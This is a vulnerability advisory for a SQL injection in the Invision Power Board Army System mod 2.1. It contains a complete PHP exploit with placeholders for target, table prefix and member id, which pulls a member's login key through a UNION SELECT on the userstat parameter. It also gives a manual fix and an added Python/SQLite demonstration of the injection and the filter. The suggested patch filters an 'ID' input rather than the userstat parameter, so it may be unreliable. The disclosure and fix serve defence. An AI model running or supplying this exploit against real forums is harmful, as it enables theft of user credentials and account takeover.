VULNERABLE PRODUCT
-----------------------------------------
Invision Power Board Army System Mod
Version: 2.1 and prior
Url: http://supersmashbrothers.2ya.com
Vulnerability: Remote SQL Injection
-----------------------------------------------------

BACKGROUND
----------------------------
Army System v2.1 is a very popular mod with a built-in ranking system. This multiplayer RPG can easily be installed on every Invision Power Board v2.x.x.
Source: "http://mods.invisionize.com/db/index.php/f/3347"
Google: "Army System 2.1 by supersmashbrothers"

********************************************************************
Requirements

Minimum:
  Invision Board: 2.0.0 Final
  PHP: 4.1.0
Recommended:
  Invision Board: 2.0.1
  PHP: 4.3.0 or better

SQL:
  Any SQL server will work fine as long as you have the driver.
  Minimum MySQL: 3.23
  Recommended MySQL: 3.23 or better

Recommended for larger sites: no memory limit and no safe mode, for faster loading.
********************************************************************

VULNERABILITY
-------------------------------
Army System is prone to a SQL injection vulnerability. The user-supplied value of the "userstat" parameter (index.php?act=army&userstat=...) is not sanitised before being used in a SQL query. A specially crafted URL could result in a compromise of the application, disclosure or modification of data (the exploit below reads a member's member_login_key out of the members table through a UNION SELECT), or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

EXPLOIT
----------------
<?php
/*
 ---------------------------
 EXPLOIT
 ---------------------------
 Invision Power Board Army System Mod 2.1 SQL Injection Exploit
 Tested on: Latest version (2.1.0)
 Discovered on: 06.02.2006 by Alex & fRoGGz
 Credits to: SecuBox Labs

 PLEASE READ THIS !
 The UNION query used by this exploit depends on the number of columns in the
 army table: the number of padding values (1 / NULL) below must match it exactly.
 We have successfully tested the exploit on a fresh IPB 2.1.x with
 Army System Mod 2.1 installed.

 IN NO EVENT SHALL THE OWNER OF THIS CODE OR CONTRIBUTORS BE LIABLE FOR ANY
 DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
 (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
 LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
 ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
 SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

$target = "http://site.com/forums/"; // <--- Where ?
$prefix = "ibf_";                    // <--- SQL prefix ?
$id     = 1;                         // <--- Who ? (member id whose login key is read)

$infos = get_infos($target, $prefix, $id);
if ($infos) {
    print_r($infos);
} else {
    echo "failed";
}

function get_infos($target, $prefix, $id)
{
    // Injected UNION: the first two selected columns carry the member id and
    // the login key, the remaining 1/NULL values only pad the column count.
    $inject  = "index.php?s=&act=army&userstat=0+UNION+SELECT+id,member_login_key,";
    $inject .= "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,";
    $inject .= "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,NULL,NULL,";
    $inject .= "NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,";
    $inject .= "NULL+FROM+".$prefix."members+WHERE+id=";

    $url    = $target . $inject . $id;
    $handle = fopen($url, "r");   // requires allow_url_fopen
    if (!$handle) {
        return false;
    }

    $infos = array();
    while (($buffer = fgets($handle)) !== false) {
        // The injected login key is rendered in the cell right after the "Name" label
        if (strpos($buffer, "<td class='pformleft' width=\"35%\">Name</td>") !== false) {
            $infos['md5'] = strip_tags(fgets($handle));
            break;
        }
    }
    fclose($handle);

    if (count($infos) == 1) {
        return $infos;
    }
    return false;
}
?>

VENDOR STATUS
---------------------------
There is no solution at the time of writing. Edit the source code manually to solve this problem (and many others!).

// You can temporarily fix the problem:
// Find sources/action_public/army.php, line 486:
$id2 = $this->ipsclass->input['ID'];
// After that line put:
$id2 = ereg_replace('([^0-9])', '', $id2);
$id2 = (int)$id2;

// Note: ereg_replace was deprecated in PHP 5.3 and removed in PHP 7;
// preg_replace('/[^0-9]/', '', $id2) does the same. The (int) cast alone is
// already enough to make the value safe for a numeric comparison in the query.
-----------------------------------------------------------------------------

CREDITS
------------------------------
SecuBox Labs - fRoGGz & Alex
Greets fly out to: Mark aka MT
Visit: http://secubox.shadock.net
--------------------------------------------
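The two mechanics the advisory relies on, a UNION injection whose column count must match the original query and the digits-only/integer filter proposed as the temporary fix, as an added, self-contained example that is not part of the original advisory or of the Army System mod. It is written in Python against an in-memory SQLite database rather than the mod's PHP/MySQL; the table layout, column names and row values are constructed for illustration (the real ibf_ tables have far more columns, which is why the exploit above pads with so many 1/NULL values):

```python
import re
import sqlite3

# Constructed sample data, not the real IPB layout: the real ibf_members and
# army tables have many more columns than the three used here.
MEMBERS = [
    (1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),  # constructed login key
    (2, "alice", "e99a18c428cb38d5f260853678922e03"),  # constructed login key
]
ARMY = [(1, "General", 900), (2, "Private", 10)]


def setup_db():
    """In-memory SQLite stand-in for the forum database (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ibf_members (id INTEGER, name TEXT, member_login_key TEXT)")
    conn.execute("CREATE TABLE ibf_army (id INTEGER, rank TEXT, exp INTEGER)")
    conn.executemany("INSERT INTO ibf_members VALUES (?, ?, ?)", MEMBERS)
    conn.executemany("INSERT INTO ibf_army VALUES (?, ?, ?)", ARMY)
    conn.commit()
    return conn


def vulnerable_army_query(conn, userstat):
    """Mirrors the flaw: the request parameter is pasted straight into the SQL."""
    sql = "SELECT id, rank, exp FROM ibf_army WHERE id=" + str(userstat)
    return conn.execute(sql).fetchall()


def hardened_army_query(conn, userstat):
    """The advisory's temporary fix (strip non-digits, cast to int) plus a bound
    parameter, so the value can never be parsed as SQL."""
    digits = re.sub(r"[^0-9]", "", str(userstat))
    uid = int(digits) if digits else 0  # PHP's (int)"" is 0 as well
    return conn.execute("SELECT id, rank, exp FROM ibf_army WHERE id=?", (uid,)).fetchall()


def find_column_count(conn, max_cols=16):
    """Probe how many columns the injected SELECT must have: a UNION whose two
    branches differ in column count is a database error, and the first width
    that succeeds is the one the payload has to pad to. This is the step the
    exploit's "depends on the number of fields" comment refers to."""
    for n in range(1, max_cols + 1):
        probe = "0 UNION SELECT " + ",".join(["NULL"] * n)
        try:
            vulnerable_army_query(conn, probe)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def union_payload(columns, target_id):
    """Same shape as the exploit's userstat value: id and member_login_key in
    the first two columns, padding for the rest, one row of the members table."""
    pad = ["1"] * (columns - 2)
    cols = ",".join(["id", "member_login_key"] + pad)
    return "0 UNION SELECT " + cols + " FROM ibf_members WHERE id=" + str(target_id)


def demo():
    """Run the probe, the leak and the filtered query on the constructed data."""
    conn = setup_db()
    width = find_column_count(conn)
    payload = union_payload(width, 1)
    leaked = vulnerable_army_query(conn, payload)   # member 1's login key appears
    blocked = hardened_army_query(conn, payload)    # same input, filtered: no row
    return width, leaked, blocked


if __name__ == "__main__":
    print(demo())
```

The digits-only filter stops the injection because whatever survives the strip is a plain integer (for the payload above it collapses to 11, a member that does not exist); the bound parameter is the belt to that pair of braces and is what a modern fix would use on its own.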